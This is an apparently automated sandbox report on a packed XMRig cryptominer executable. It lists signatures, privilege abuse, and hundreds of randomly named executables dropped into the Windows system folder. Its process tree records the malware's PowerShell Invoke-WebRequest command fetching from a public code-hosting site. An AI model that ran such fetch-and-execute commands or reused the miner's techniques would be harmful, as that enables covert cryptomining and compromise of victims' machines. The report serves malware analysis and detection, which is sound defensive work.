Malware Analysis Report

2024-09-10 13:57

Sample ID: 240613-qbtnbazeje
Target: 7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe
SHA256: 81e475626b0f5685dc027c877f31a63069d681a15322426b4cd8917694988ae3
Tags: upx, miner, xmrig, execution
Score: 10/10

Analysis Overview

Threat Level: Known bad

The file 7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

Xmrig family

XMRig Miner payload

xmrig

Command and Scripting Interpreter: PowerShell

UPX packed file

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 13:05

Signatures

XMRig Miner payload

miner

Xmrig family

xmrig

UPX packed file

upx

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 13:05

Reported

2024-06-13 13:08

Platform

win7-20240221-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A

UPX packed file

upx

Drops file in Windows directory


Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory


Processes

C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\vfUTRVM.exe

C:\Windows\System\vfUTRVM.exe

C:\Windows\System\JETKhCT.exe

C:\Windows\System\JETKhCT.exe

C:\Windows\System\FbDcfep.exe

C:\Windows\System\FbDcfep.exe

C:\Windows\System\drshuKh.exe

C:\Windows\System\drshuKh.exe

C:\Windows\System\MzpjFPC.exe

C:\Windows\System\MzpjFPC.exe

C:\Windows\System\OLTgaWi.exe

C:\Windows\System\OLTgaWi.exe

C:\Windows\System\yjoHDQH.exe

C:\Windows\System\yjoHDQH.exe

C:\Windows\System\WiWXfHk.exe

C:\Windows\System\WiWXfHk.exe

C:\Windows\System\QEOKTTx.exe

C:\Windows\System\QEOKTTx.exe

C:\Windows\System\OaxRYtT.exe

C:\Windows\System\OaxRYtT.exe

C:\Windows\System\BcNcNkH.exe

C:\Windows\System\BcNcNkH.exe

C:\Windows\System\OdoyAaD.exe

C:\Windows\System\OdoyAaD.exe

C:\Windows\System\JzDKgiM.exe

C:\Windows\System\JzDKgiM.exe

C:\Windows\System\QXsNSuR.exe

C:\Windows\System\QXsNSuR.exe

C:\Windows\System\DSvfXgD.exe

C:\Windows\System\DSvfXgD.exe

C:\Windows\System\Uahsski.exe

C:\Windows\System\Uahsski.exe

C:\Windows\System\RzJZxwx.exe

C:\Windows\System\RzJZxwx.exe

C:\Windows\System\dKYIowa.exe

C:\Windows\System\dKYIowa.exe

C:\Windows\System\pgLbfum.exe

C:\Windows\System\pgLbfum.exe

C:\Windows\System\EyYPRvH.exe

C:\Windows\System\EyYPRvH.exe

C:\Windows\System\AuArurr.exe

C:\Windows\System\AuArurr.exe

C:\Windows\System\OROYZAq.exe

C:\Windows\System\OROYZAq.exe

C:\Windows\System\CjMFwbw.exe

C:\Windows\System\CjMFwbw.exe

C:\Windows\System\AekkuuD.exe

C:\Windows\System\AekkuuD.exe

C:\Windows\System\NDblhwn.exe

C:\Windows\System\NDblhwn.exe

C:\Windows\System\atvrXOX.exe

C:\Windows\System\atvrXOX.exe

C:\Windows\System\nODlZnS.exe

C:\Windows\System\nODlZnS.exe

C:\Windows\System\OatHwKk.exe

C:\Windows\System\OatHwKk.exe

C:\Windows\System\HZdtGXw.exe

C:\Windows\System\HZdtGXw.exe

C:\Windows\System\AXpupuT.exe

C:\Windows\System\AXpupuT.exe

C:\Windows\System\kacNAGF.exe

C:\Windows\System\kacNAGF.exe

C:\Windows\System\QkgxdVy.exe

C:\Windows\System\QkgxdVy.exe

C:\Windows\System\pkkiULP.exe

C:\Windows\System\pkkiULP.exe

C:\Windows\System\GzrSltU.exe

C:\Windows\System\GzrSltU.exe

C:\Windows\System\fJdpXQA.exe

C:\Windows\System\fJdpXQA.exe

C:\Windows\System\vJOFXFw.exe

C:\Windows\System\vJOFXFw.exe

C:\Windows\System\YlPkGsU.exe

C:\Windows\System\YlPkGsU.exe

C:\Windows\System\kjUwFFP.exe

C:\Windows\System\kjUwFFP.exe

C:\Windows\System\cQWPHHL.exe

C:\Windows\System\cQWPHHL.exe

C:\Windows\System\PotqswV.exe

C:\Windows\System\PotqswV.exe

C:\Windows\System\BKHZDIh.exe

C:\Windows\System\BKHZDIh.exe

C:\Windows\System\dCVNxqc.exe

C:\Windows\System\dCVNxqc.exe

C:\Windows\System\SxaqTkD.exe

C:\Windows\System\SxaqTkD.exe

C:\Windows\System\ooGEDoh.exe

C:\Windows\System\ooGEDoh.exe

C:\Windows\System\HAboobG.exe

C:\Windows\System\HAboobG.exe

C:\Windows\System\fYRataX.exe

C:\Windows\System\fYRataX.exe

C:\Windows\System\QDhnEcb.exe

C:\Windows\System\QDhnEcb.exe

C:\Windows\System\IbCeMzq.exe

C:\Windows\System\IbCeMzq.exe

C:\Windows\System\Ufkricf.exe

C:\Windows\System\Ufkricf.exe

C:\Windows\System\fpSjZZH.exe

C:\Windows\System\fpSjZZH.exe

C:\Windows\System\Nxiglhw.exe

C:\Windows\System\Nxiglhw.exe

C:\Windows\System\kpFoNHM.exe

C:\Windows\System\kpFoNHM.exe

C:\Windows\System\DMcGSUu.exe

C:\Windows\System\DMcGSUu.exe

C:\Windows\System\WOCmCbL.exe

C:\Windows\System\WOCmCbL.exe

C:\Windows\System\DpWaqvG.exe

C:\Windows\System\DpWaqvG.exe

C:\Windows\System\LaQCicw.exe

C:\Windows\System\LaQCicw.exe

C:\Windows\System\aQOzSzE.exe

C:\Windows\System\aQOzSzE.exe

C:\Windows\System\jIjwRqZ.exe

C:\Windows\System\jIjwRqZ.exe

C:\Windows\System\QhAlrIL.exe

C:\Windows\System\QhAlrIL.exe

C:\Windows\System\KtTcnLN.exe

C:\Windows\System\KtTcnLN.exe

C:\Windows\System\sZkjsyr.exe

C:\Windows\System\sZkjsyr.exe

C:\Windows\System\VCMSroA.exe

C:\Windows\System\VCMSroA.exe

C:\Windows\System\LKWHrIi.exe

C:\Windows\System\LKWHrIi.exe

C:\Windows\System\BgsiCio.exe

C:\Windows\System\BgsiCio.exe

C:\Windows\System\zAAWfvb.exe

C:\Windows\System\zAAWfvb.exe

C:\Windows\System\HEGZwMl.exe

C:\Windows\System\HEGZwMl.exe

C:\Windows\System\kHJkFIW.exe

C:\Windows\System\kHJkFIW.exe

C:\Windows\System\jzVXLuZ.exe

C:\Windows\System\jzVXLuZ.exe

C:\Windows\System\KUWKyeB.exe

C:\Windows\System\KUWKyeB.exe

C:\Windows\System\SgpjrGL.exe

C:\Windows\System\SgpjrGL.exe

C:\Windows\System\anKUzKT.exe

C:\Windows\System\anKUzKT.exe

C:\Windows\System\JuvAjNO.exe

C:\Windows\System\JuvAjNO.exe

C:\Windows\System\sgRONvb.exe

C:\Windows\System\sgRONvb.exe

C:\Windows\System\vLbXsPu.exe

C:\Windows\System\vLbXsPu.exe

C:\Windows\System\UwpEIBd.exe

C:\Windows\System\UwpEIBd.exe

C:\Windows\System\IwxVuhB.exe

C:\Windows\System\IwxVuhB.exe

C:\Windows\System\sUWnOFn.exe

C:\Windows\System\sUWnOFn.exe

C:\Windows\System\FBhhEQj.exe

C:\Windows\System\FBhhEQj.exe

C:\Windows\System\XpVpcEF.exe

C:\Windows\System\XpVpcEF.exe

C:\Windows\System\uqPUfUj.exe

C:\Windows\System\uqPUfUj.exe

C:\Windows\System\qEhbhMS.exe

C:\Windows\System\qEhbhMS.exe

C:\Windows\System\pjQrzpu.exe

C:\Windows\System\pjQrzpu.exe

C:\Windows\System\OuRAMNI.exe

C:\Windows\System\OuRAMNI.exe

C:\Windows\System\MeuwhKl.exe

C:\Windows\System\MeuwhKl.exe

C:\Windows\System\NOUoHwp.exe

C:\Windows\System\NOUoHwp.exe

C:\Windows\System\FdKsmiJ.exe

C:\Windows\System\FdKsmiJ.exe

C:\Windows\System\crMBXUe.exe

C:\Windows\System\crMBXUe.exe

C:\Windows\System\BJDCgAA.exe

C:\Windows\System\BJDCgAA.exe

C:\Windows\System\rXJwSTf.exe

C:\Windows\System\rXJwSTf.exe

C:\Windows\System\lqyDAzL.exe

C:\Windows\System\lqyDAzL.exe

C:\Windows\System\YIgrqUw.exe

C:\Windows\System\YIgrqUw.exe

C:\Windows\System\XPtGWNB.exe

C:\Windows\System\XPtGWNB.exe

C:\Windows\System\labpYYL.exe

C:\Windows\System\labpYYL.exe

C:\Windows\System\DjuGqVa.exe

C:\Windows\System\DjuGqVa.exe

C:\Windows\System\uoXFzEQ.exe

C:\Windows\System\uoXFzEQ.exe

C:\Windows\System\dIPiPDy.exe

C:\Windows\System\dIPiPDy.exe

C:\Windows\System\BagwnMH.exe

C:\Windows\System\BagwnMH.exe

C:\Windows\System\rnrtobZ.exe

C:\Windows\System\rnrtobZ.exe

C:\Windows\System\zAWYztS.exe

C:\Windows\System\zAWYztS.exe

C:\Windows\System\IwUzpxT.exe

C:\Windows\System\IwUzpxT.exe

C:\Windows\System\aSbcEJX.exe

C:\Windows\System\aSbcEJX.exe

C:\Windows\System\AwIgPfz.exe

C:\Windows\System\AwIgPfz.exe

C:\Windows\System\zDVNfht.exe

C:\Windows\System\zDVNfht.exe

C:\Windows\System\ULyGrxh.exe

C:\Windows\System\ULyGrxh.exe

C:\Windows\System\UBkANtZ.exe

C:\Windows\System\UBkANtZ.exe

C:\Windows\System\LZPNqfX.exe

C:\Windows\System\LZPNqfX.exe

C:\Windows\System\lKwigLk.exe

C:\Windows\System\lKwigLk.exe

C:\Windows\System\ahZBfZb.exe

C:\Windows\System\ahZBfZb.exe

C:\Windows\System\rLHEwYr.exe

C:\Windows\System\rLHEwYr.exe

C:\Windows\System\FBGVSHG.exe

C:\Windows\System\FBGVSHG.exe

C:\Windows\System\tTeybXZ.exe

C:\Windows\System\tTeybXZ.exe

C:\Windows\System\hYlDcpK.exe

C:\Windows\System\hYlDcpK.exe

C:\Windows\System\GVsbnjL.exe

C:\Windows\System\GVsbnjL.exe

C:\Windows\System\GxHZjTp.exe

C:\Windows\System\GxHZjTp.exe

C:\Windows\System\vxwrInM.exe

C:\Windows\System\vxwrInM.exe

C:\Windows\System\HdhcNeZ.exe

C:\Windows\System\HdhcNeZ.exe

C:\Windows\System\fJycIHb.exe

C:\Windows\System\fJycIHb.exe

C:\Windows\System\VCYXQHJ.exe

C:\Windows\System\VCYXQHJ.exe

C:\Windows\System\wVLLaZG.exe

C:\Windows\System\wVLLaZG.exe

C:\Windows\System\eDDHrme.exe

C:\Windows\System\eDDHrme.exe

C:\Windows\System\rcJVnDy.exe

C:\Windows\System\rcJVnDy.exe

C:\Windows\System\qntXEJR.exe

C:\Windows\System\qntXEJR.exe

C:\Windows\System\sEKpFLo.exe

C:\Windows\System\sEKpFLo.exe

C:\Windows\System\kYWJeZW.exe

C:\Windows\System\kYWJeZW.exe

C:\Windows\System\ccPCBGv.exe

C:\Windows\System\ccPCBGv.exe

C:\Windows\System\KdhSamk.exe

C:\Windows\System\KdhSamk.exe

C:\Windows\System\dNEwQFF.exe

C:\Windows\System\dNEwQFF.exe

C:\Windows\System\lkeNpin.exe

C:\Windows\System\lkeNpin.exe

C:\Windows\System\srDepuj.exe

C:\Windows\System\srDepuj.exe

C:\Windows\System\CHsxQmL.exe

C:\Windows\System\CHsxQmL.exe

C:\Windows\System\SIWaBFV.exe

C:\Windows\System\SIWaBFV.exe

C:\Windows\System\KBcBtWy.exe

C:\Windows\System\KBcBtWy.exe

C:\Windows\System\wXFLJZe.exe

C:\Windows\System\wXFLJZe.exe

C:\Windows\System\GhPISCq.exe

C:\Windows\System\GhPISCq.exe

C:\Windows\System\QFvazFu.exe

C:\Windows\System\QFvazFu.exe

C:\Windows\System\fodTcVH.exe

C:\Windows\System\fodTcVH.exe

C:\Windows\System\uikdTIZ.exe

C:\Windows\System\uikdTIZ.exe

C:\Windows\System\OEwyTvW.exe

C:\Windows\System\OEwyTvW.exe

C:\Windows\System\QCVxhiF.exe

C:\Windows\System\QCVxhiF.exe

C:\Windows\System\PXEMjRc.exe

C:\Windows\System\PXEMjRc.exe

C:\Windows\System\KmuLaiN.exe

C:\Windows\System\KmuLaiN.exe

C:\Windows\System\FcBbEUz.exe

C:\Windows\System\FcBbEUz.exe

C:\Windows\System\RypetVH.exe

C:\Windows\System\RypetVH.exe

C:\Windows\System\HDRijYz.exe

C:\Windows\System\HDRijYz.exe

C:\Windows\System\MPYxUWP.exe

C:\Windows\System\MPYxUWP.exe

C:\Windows\System\nTrKFbm.exe

C:\Windows\System\nTrKFbm.exe

C:\Windows\System\yuQyiCE.exe

C:\Windows\System\yuQyiCE.exe

C:\Windows\System\iFTZhiY.exe

C:\Windows\System\iFTZhiY.exe

C:\Windows\System\OgcGBEZ.exe

C:\Windows\System\OgcGBEZ.exe

C:\Windows\System\PdzPgUL.exe

C:\Windows\System\PdzPgUL.exe

C:\Windows\System\YHmCOzA.exe

C:\Windows\System\YHmCOzA.exe

C:\Windows\System\toiJUZq.exe

C:\Windows\System\toiJUZq.exe

C:\Windows\System\XeprHzz.exe

C:\Windows\System\XeprHzz.exe

C:\Windows\System\NOPoFtg.exe

C:\Windows\System\NOPoFtg.exe

C:\Windows\System\MnokotE.exe

C:\Windows\System\MnokotE.exe

C:\Windows\System\aDaRrVL.exe

C:\Windows\System\aDaRrVL.exe

C:\Windows\System\PkLHoco.exe

C:\Windows\System\PkLHoco.exe

C:\Windows\System\NZUJAHX.exe

C:\Windows\System\NZUJAHX.exe

C:\Windows\System\phIlqbr.exe

C:\Windows\System\phIlqbr.exe

C:\Windows\System\RMcaHcc.exe

C:\Windows\System\RMcaHcc.exe

C:\Windows\System\nrNGHJf.exe

C:\Windows\System\nrNGHJf.exe

C:\Windows\System\ptGhfqF.exe

C:\Windows\System\ptGhfqF.exe

C:\Windows\System\PYdROmW.exe

C:\Windows\System\PYdROmW.exe

C:\Windows\System\COJBiWq.exe

C:\Windows\System\COJBiWq.exe

C:\Windows\System\YJHSEdo.exe

C:\Windows\System\YJHSEdo.exe

C:\Windows\System\riNzCMS.exe

C:\Windows\System\riNzCMS.exe

C:\Windows\System\LirjfZX.exe

C:\Windows\System\LirjfZX.exe

C:\Windows\System\QvUgnxX.exe

C:\Windows\System\QvUgnxX.exe

C:\Windows\System\ZPMoDaG.exe

C:\Windows\System\ZPMoDaG.exe

C:\Windows\System\LDbyrRj.exe

C:\Windows\System\LDbyrRj.exe

C:\Windows\System\cgDxFVb.exe

C:\Windows\System\cgDxFVb.exe

C:\Windows\System\qJoSKMq.exe

C:\Windows\System\qJoSKMq.exe

C:\Windows\System\TgTLetS.exe

C:\Windows\System\TgTLetS.exe

C:\Windows\System\oznfxkz.exe

C:\Windows\System\oznfxkz.exe

C:\Windows\System\PqKWlTP.exe

C:\Windows\System\PqKWlTP.exe

C:\Windows\System\GSCytbh.exe

C:\Windows\System\GSCytbh.exe

C:\Windows\System\xCezsXB.exe

C:\Windows\System\xCezsXB.exe

C:\Windows\System\ewkARdA.exe

C:\Windows\System\ewkARdA.exe

C:\Windows\System\RkQRVRm.exe

C:\Windows\System\RkQRVRm.exe

C:\Windows\System\kfgtRaW.exe

C:\Windows\System\kfgtRaW.exe

C:\Windows\System\ADtrHBD.exe

C:\Windows\System\ADtrHBD.exe

C:\Windows\System\bDzfPSD.exe

C:\Windows\System\bDzfPSD.exe

C:\Windows\System\qxqcUoK.exe

C:\Windows\System\qxqcUoK.exe

C:\Windows\System\YJiGlfe.exe

C:\Windows\System\YJiGlfe.exe

C:\Windows\System\iCjIYUw.exe

C:\Windows\System\iCjIYUw.exe

C:\Windows\System\jhpVDGz.exe

C:\Windows\System\jhpVDGz.exe

C:\Windows\System\UjOHcxI.exe

C:\Windows\System\UjOHcxI.exe

C:\Windows\System\IVDKywY.exe

C:\Windows\System\IVDKywY.exe

C:\Windows\System\PtObMiC.exe

C:\Windows\System\PtObMiC.exe

C:\Windows\System\yhTIvbn.exe

C:\Windows\System\yhTIvbn.exe

C:\Windows\System\poEWFDB.exe

C:\Windows\System\poEWFDB.exe

C:\Windows\System\MpgyBlx.exe

C:\Windows\System\MpgyBlx.exe

C:\Windows\System\DmYLCqn.exe

C:\Windows\System\DmYLCqn.exe

C:\Windows\System\LtcZbSn.exe

C:\Windows\System\LtcZbSn.exe

C:\Windows\System\fvxmiBG.exe

C:\Windows\System\fvxmiBG.exe

C:\Windows\System\baXrdoT.exe

C:\Windows\System\baXrdoT.exe

C:\Windows\System\RmHOxXr.exe

C:\Windows\System\RmHOxXr.exe

C:\Windows\System\pDKwTJg.exe

C:\Windows\System\pDKwTJg.exe

C:\Windows\System\LoOAjGP.exe

C:\Windows\System\LoOAjGP.exe

C:\Windows\System\xnsEHhX.exe

C:\Windows\System\xnsEHhX.exe

C:\Windows\System\FPZpxuE.exe

C:\Windows\System\FPZpxuE.exe

C:\Windows\System\qYPEpXS.exe

C:\Windows\System\qYPEpXS.exe

C:\Windows\System\vNnRcBb.exe

C:\Windows\System\vNnRcBb.exe

C:\Windows\System\cUWzIOj.exe

C:\Windows\System\cUWzIOj.exe

C:\Windows\System\PxXQfql.exe

C:\Windows\System\PxXQfql.exe

C:\Windows\System\dMfrxom.exe

C:\Windows\System\dMfrxom.exe

C:\Windows\System\MTZghHh.exe

C:\Windows\System\MTZghHh.exe

C:\Windows\System\oWgThSB.exe

C:\Windows\System\oWgThSB.exe

C:\Windows\System\puSIrMo.exe

C:\Windows\System\puSIrMo.exe

C:\Windows\System\GeFpbqU.exe

C:\Windows\System\GeFpbqU.exe

C:\Windows\System\BCYvBzI.exe

C:\Windows\System\BCYvBzI.exe

C:\Windows\System\ZDfZFTw.exe

C:\Windows\System\ZDfZFTw.exe

C:\Windows\System\ejxjlgQ.exe

C:\Windows\System\ejxjlgQ.exe

C:\Windows\System\BzUkoQU.exe

C:\Windows\System\BzUkoQU.exe

C:\Windows\System\eGbnJzS.exe

C:\Windows\System\eGbnJzS.exe

C:\Windows\System\NJZrxCY.exe

C:\Windows\System\NJZrxCY.exe

C:\Windows\System\BMgekhM.exe

C:\Windows\System\BMgekhM.exe

C:\Windows\System\KmzsOIS.exe

C:\Windows\System\KmzsOIS.exe

C:\Windows\System\QjKgkgs.exe

C:\Windows\System\QjKgkgs.exe

C:\Windows\System\eCXwpzF.exe

C:\Windows\System\eCXwpzF.exe

C:\Windows\System\ZPyntnU.exe

C:\Windows\System\ZPyntnU.exe

C:\Windows\System\HDHuYDk.exe

C:\Windows\System\HDHuYDk.exe

C:\Windows\System\mWMwgkr.exe

C:\Windows\System\mWMwgkr.exe

C:\Windows\System\EOhkgdh.exe

C:\Windows\System\EOhkgdh.exe

C:\Windows\System\rECUREQ.exe

C:\Windows\System\rECUREQ.exe

C:\Windows\System\APYVWDf.exe

C:\Windows\System\APYVWDf.exe

C:\Windows\System\jVrEaJd.exe

C:\Windows\System\jVrEaJd.exe

C:\Windows\System\WDNKvoa.exe

C:\Windows\System\WDNKvoa.exe

C:\Windows\System\RupuhFr.exe

C:\Windows\System\RupuhFr.exe

C:\Windows\System\iRCvIYT.exe

C:\Windows\System\iRCvIYT.exe

C:\Windows\System\JTTtPiO.exe

C:\Windows\System\JTTtPiO.exe

C:\Windows\System\QAnEhUg.exe

C:\Windows\System\QAnEhUg.exe

C:\Windows\System\zkXsJFb.exe

C:\Windows\System\zkXsJFb.exe

C:\Windows\System\gxlSvNA.exe

C:\Windows\System\gxlSvNA.exe

C:\Windows\System\DkPhBOl.exe

C:\Windows\System\DkPhBOl.exe

C:\Windows\System\cQVTNbm.exe

C:\Windows\System\cQVTNbm.exe

C:\Windows\System\ytgnOJg.exe

C:\Windows\System\ytgnOJg.exe

C:\Windows\System\GZpmhXH.exe

C:\Windows\System\GZpmhXH.exe

C:\Windows\System\cpFmkHe.exe

C:\Windows\System\cpFmkHe.exe

C:\Windows\System\HpHrTrf.exe

C:\Windows\System\HpHrTrf.exe

C:\Windows\System\XOvLxxu.exe

C:\Windows\System\XOvLxxu.exe

C:\Windows\System\AbPHfJs.exe

C:\Windows\System\AbPHfJs.exe

C:\Windows\System\HzwwTJS.exe

C:\Windows\System\HzwwTJS.exe

C:\Windows\System\OJJiFUU.exe

C:\Windows\System\OJJiFUU.exe

C:\Windows\System\QvQJYil.exe

C:\Windows\System\QvQJYil.exe

C:\Windows\System\ZpWJMYX.exe

C:\Windows\System\ZpWJMYX.exe

C:\Windows\System\XDgJzkv.exe

C:\Windows\System\XDgJzkv.exe

C:\Windows\System\BBqeJPJ.exe

C:\Windows\System\BBqeJPJ.exe

C:\Windows\System\vgjvMKX.exe

C:\Windows\System\vgjvMKX.exe

C:\Windows\System\WStwxXB.exe

C:\Windows\System\WStwxXB.exe

C:\Windows\System\MsVTpaD.exe

C:\Windows\System\MsVTpaD.exe

C:\Windows\System\VuHLErD.exe

C:\Windows\System\VuHLErD.exe

C:\Windows\System\jXvmcAn.exe

C:\Windows\System\jXvmcAn.exe

C:\Windows\System\WGWgSjd.exe

C:\Windows\System\WGWgSjd.exe

C:\Windows\System\TGowFel.exe

C:\Windows\System\TGowFel.exe

C:\Windows\System\occsHTx.exe

C:\Windows\System\occsHTx.exe

C:\Windows\System\UAwnCQN.exe

C:\Windows\System\UAwnCQN.exe

C:\Windows\System\piTtlrK.exe

C:\Windows\System\piTtlrK.exe

C:\Windows\System\NWQkJsL.exe

C:\Windows\System\NWQkJsL.exe

C:\Windows\System\ePHMCvR.exe

C:\Windows\System\ePHMCvR.exe

C:\Windows\System\aTHTgzR.exe

C:\Windows\System\aTHTgzR.exe

C:\Windows\System\UnKNhvh.exe

C:\Windows\System\UnKNhvh.exe

C:\Windows\System\XJYmuzE.exe

C:\Windows\System\XJYmuzE.exe

C:\Windows\System\nvDscrW.exe

C:\Windows\System\nvDscrW.exe

C:\Windows\System\ucpleif.exe

C:\Windows\System\ucpleif.exe

C:\Windows\System\kuBHUJs.exe

C:\Windows\System\kuBHUJs.exe

C:\Windows\System\pZhKskt.exe

C:\Windows\System\pZhKskt.exe

C:\Windows\System\PpqWZsr.exe

C:\Windows\System\PpqWZsr.exe

C:\Windows\System\QBYkFuA.exe

C:\Windows\System\QBYkFuA.exe

C:\Windows\System\BKtOwHb.exe

C:\Windows\System\BKtOwHb.exe

C:\Windows\System\irGixPl.exe

C:\Windows\System\irGixPl.exe

C:\Windows\System\synVoYy.exe

C:\Windows\System\synVoYy.exe

C:\Windows\System\XjmmGwH.exe

C:\Windows\System\XjmmGwH.exe

C:\Windows\System\nUqcgqa.exe

C:\Windows\System\nUqcgqa.exe

C:\Windows\System\dwgOqze.exe

C:\Windows\System\dwgOqze.exe

C:\Windows\System\OlanRJg.exe

C:\Windows\System\OlanRJg.exe

C:\Windows\System\GHDZrua.exe

C:\Windows\System\GHDZrua.exe

C:\Windows\System\bWavmUP.exe

C:\Windows\System\bWavmUP.exe

C:\Windows\System\BQXUzLd.exe

C:\Windows\System\BQXUzLd.exe

C:\Windows\System\JoxjdNE.exe

C:\Windows\System\JoxjdNE.exe

C:\Windows\System\YyxVIfG.exe

C:\Windows\System\YyxVIfG.exe

C:\Windows\System\qguZusk.exe

C:\Windows\System\qguZusk.exe

C:\Windows\System\LIstSSm.exe

C:\Windows\System\LIstSSm.exe

C:\Windows\System\MJWfxxk.exe

C:\Windows\System\MJWfxxk.exe

C:\Windows\System\GcDVEdz.exe

C:\Windows\System\GcDVEdz.exe

C:\Windows\System\JDOVOPb.exe

C:\Windows\System\JDOVOPb.exe

C:\Windows\System\tODkypD.exe

C:\Windows\System\tODkypD.exe

C:\Windows\System\DlWkfUl.exe

C:\Windows\System\DlWkfUl.exe

C:\Windows\System\cDxHMAx.exe

C:\Windows\System\cDxHMAx.exe

C:\Windows\System\xcAhgEJ.exe

C:\Windows\System\xcAhgEJ.exe

C:\Windows\System\OPXGLwz.exe

C:\Windows\System\OPXGLwz.exe

C:\Windows\System\rzjRLbm.exe

C:\Windows\System\rzjRLbm.exe

C:\Windows\System\tjeMMTd.exe

C:\Windows\System\tjeMMTd.exe

C:\Windows\System\BhsGrgD.exe

C:\Windows\System\BhsGrgD.exe

C:\Windows\System\dwTjukN.exe

C:\Windows\System\dwTjukN.exe

C:\Windows\System\LGvPYaQ.exe

C:\Windows\System\LGvPYaQ.exe

C:\Windows\System\HwYIuFI.exe

C:\Windows\System\HwYIuFI.exe

C:\Windows\System\aBmLrdN.exe

C:\Windows\System\aBmLrdN.exe

C:\Windows\System\pIDgqXO.exe

C:\Windows\System\pIDgqXO.exe

C:\Windows\System\nHRIsoG.exe

C:\Windows\System\nHRIsoG.exe

C:\Windows\System\FYCiMEE.exe

C:\Windows\System\FYCiMEE.exe

C:\Windows\System\HGnLLGO.exe

C:\Windows\System\HGnLLGO.exe

C:\Windows\System\CCKdxhm.exe

C:\Windows\System\CCKdxhm.exe

C:\Windows\System\zJlnMaX.exe

C:\Windows\System\zJlnMaX.exe

C:\Windows\System\RBvgZTB.exe

C:\Windows\System\RBvgZTB.exe

C:\Windows\System\wYRiwOA.exe

C:\Windows\System\wYRiwOA.exe

C:\Windows\System\UfQKvAF.exe

C:\Windows\System\UfQKvAF.exe

C:\Windows\System\SKFDUan.exe

C:\Windows\System\SKFDUan.exe

C:\Windows\System\sbkkaau.exe

C:\Windows\System\sbkkaau.exe

C:\Windows\System\DdjFGZq.exe

C:\Windows\System\DdjFGZq.exe

C:\Windows\System\NBRCxBF.exe

C:\Windows\System\NBRCxBF.exe

C:\Windows\System\XKfRbmW.exe

C:\Windows\System\XKfRbmW.exe

C:\Windows\System\ZFmuIBv.exe

C:\Windows\System\ZFmuIBv.exe

C:\Windows\System\uubLzKn.exe

C:\Windows\System\uubLzKn.exe

C:\Windows\System\rxGhwqU.exe

C:\Windows\System\rxGhwqU.exe

C:\Windows\System\IupFfFS.exe

C:\Windows\System\IupFfFS.exe

C:\Windows\System\ZyLHiav.exe

C:\Windows\System\ZyLHiav.exe

C:\Windows\System\RdiCezR.exe

C:\Windows\System\RdiCezR.exe

C:\Windows\System\jEBiZOy.exe

C:\Windows\System\jEBiZOy.exe

C:\Windows\System\PrQdHIg.exe

C:\Windows\System\PrQdHIg.exe

C:\Windows\System\CJCjTOC.exe

C:\Windows\System\CJCjTOC.exe

C:\Windows\System\NvsxvBH.exe

C:\Windows\System\NvsxvBH.exe

C:\Windows\System\enMtRWx.exe

C:\Windows\System\enMtRWx.exe

C:\Windows\System\SvvniPE.exe

C:\Windows\System\SvvniPE.exe

C:\Windows\System\LlHivbf.exe

C:\Windows\System\LlHivbf.exe

C:\Windows\System\iEyxtst.exe

C:\Windows\System\iEyxtst.exe

C:\Windows\System\ilgoVaG.exe

C:\Windows\System\ilgoVaG.exe

C:\Windows\System\AbeJylj.exe

C:\Windows\System\AbeJylj.exe

C:\Windows\System\hMHFLqz.exe

C:\Windows\System\hMHFLqz.exe

C:\Windows\System\nUOimox.exe

C:\Windows\System\nUOimox.exe

C:\Windows\System\nOfGaqZ.exe

C:\Windows\System\nOfGaqZ.exe

C:\Windows\System\PZVpJnj.exe

C:\Windows\System\PZVpJnj.exe

C:\Windows\System\tailuEi.exe

C:\Windows\System\tailuEi.exe

C:\Windows\System\EcDjZCT.exe

C:\Windows\System\EcDjZCT.exe

C:\Windows\System\lankhDt.exe

C:\Windows\System\lankhDt.exe

C:\Windows\System\wiLJmFm.exe

C:\Windows\System\wiLJmFm.exe

C:\Windows\System\SICUMtV.exe

C:\Windows\System\SICUMtV.exe

C:\Windows\System\KlNXSAU.exe

C:\Windows\System\KlNXSAU.exe

C:\Windows\System\gbBjpuW.exe

C:\Windows\System\gbBjpuW.exe

C:\Windows\System\FpbossB.exe

C:\Windows\System\FpbossB.exe

C:\Windows\System\VUlyKAy.exe

C:\Windows\System\VUlyKAy.exe

C:\Windows\System\FewYFTN.exe

C:\Windows\System\FewYFTN.exe

C:\Windows\System\KFZFdVl.exe

C:\Windows\System\KFZFdVl.exe

C:\Windows\System\UrqNdkL.exe

C:\Windows\System\UrqNdkL.exe

C:\Windows\System\dGtMUzg.exe

C:\Windows\System\dGtMUzg.exe

C:\Windows\System\rCvKKFL.exe

C:\Windows\System\rCvKKFL.exe

C:\Windows\System\ibzwFcS.exe

C:\Windows\System\ibzwFcS.exe

